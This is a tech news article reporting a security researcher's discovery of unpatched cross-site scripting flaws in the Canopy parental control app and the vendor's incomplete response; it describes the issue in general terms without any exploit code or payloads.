This top parental control app has a serious security flaw

Flaw can be used to compromise both the privacy and security of the child, parent, and their device

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

A flaw in the popularparental controlapp, Canopy, makes it vulnerable to cross-site scripting (XSS) attacks, reportcybersecurityresearchers.

The Canopy parental control app has an exhaustive list of features that allow parents to limit and monitor use of protected devices.

It was advertised toTripwire’s Craig Young by his child’s school, who then discovered that the app fails to sanitize user-inputs. The flaw can be exploited by planting a maliciousJavaScriptinto the parent portal.

We’re looking at how our readers use VPNs with streaming sites like Netflix so we can improve our content and offer better advice. This survey won’t take more than 60 seconds of your time, and we’d hugely appreciate if you’d share your experiences with us.

Click here to start the survey in a new window«

“When the parent logs in, the attacker would have access to the parent portal and all features a parent has for monitoring and controlling child devices. It looks like an attacker would be able to do this en masse to all customers of Canopy,”notesYoung in his breakdown of the app’s flaws.

Abusing privileged access

Being a security researcher, Young was intrigued by the app’s list of features, many of which suggested that the app will have privileged access to the protected device. This privileged access has the potential of introducing risk to the protected devices and the privacy of the children using those devices, argues Young.

While exploring the app he discovered that the block page  enabled the child to request access to the blocked resource page, as well as a text box to send a message. Much to Young’s surprise though, the input field wasn’t sanitized and allowed up to 50 characters, which he notes is enough to call in a malicious external script.

While his first tests were innocent examples of how a child could exploit the vulnerability to access blocked resources, and even pause monitoring protection altogether.

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

However, the threats arising out of the vulnerability were a lot more serious, and Young has consciously avoided sharing details in his post since Canopy has failed to fix all the attack scenarios.

“I reached out to Canopy by phone and by email repeatedly. Ultimately, they produced a fix for the XSS from child to parent but failed to do anything to protect against the parent to child XSS or XSS through the URL of a blocked page request before becoming unresponsive. Canopy needs to implement sanitization of all user-input fields but has failed to do so,” claims Young.

With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’sTechRadar Pro’sexpert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.

A new form of macOS malware is being used by devious North Korean hackers

Scammers are using fake copyright infringement claims to hack businesses

England vs Australia live stream: how to watch 2024 rugby union Autumn International online from anywhere